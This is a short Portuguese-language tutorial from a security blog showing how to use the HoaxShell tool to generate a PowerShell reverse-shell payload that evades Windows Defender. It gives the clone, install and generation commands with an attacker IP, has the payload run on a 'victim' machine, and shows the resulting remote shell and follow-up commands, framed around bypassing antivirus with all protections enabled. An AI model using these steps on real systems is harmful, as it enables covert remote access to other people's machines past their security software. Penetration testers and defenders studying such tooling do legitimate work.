HoaxShell - Reverse Shell

HoaxShell é uma ferramenta desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus conhecidos.

01 - Passo

Realize o clone do projeto hoaxshell e liste o conteúdo do diretório.

Linux 
git clone https://github.com/t3l3machus/hoaxshell

cd hoaxshell/

ls -l

02 - Passo

Realize a instalação das dependências :

Linux 
pip3 install -r requirements.txt

03 - Passo

Para gerar o payload basta executar o script seguido do IP do Atacante :

Linux 
python3 hoaxshell.py -s 192.168.0.53

04 - Passo

Copie o payload gerado em PowerShell :

05 - Passo

Certifique-se que o Windows Defender esteja com todas as proteções habilitadas :

06 - Passo

Execute o payload na máquina da Vítima.

07 - Passo

Observe que a conexão reversa é estabelecida com sucesso!

Linux 
PS C:\Users\100security>

08 - Passo

Digite os comandos :

Linux 
hostname

ipconfig

09 - Passo

Para confirmar se o Windows Defender está habilitado digite :

PowerShell 
Get-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated

👍 Se este artigo te ajudou compartilhe!



  Autor

João Paulo

 São Paulo/SP



  Ferramentas de Exploração

© 2024 - 100SECURITY

Contato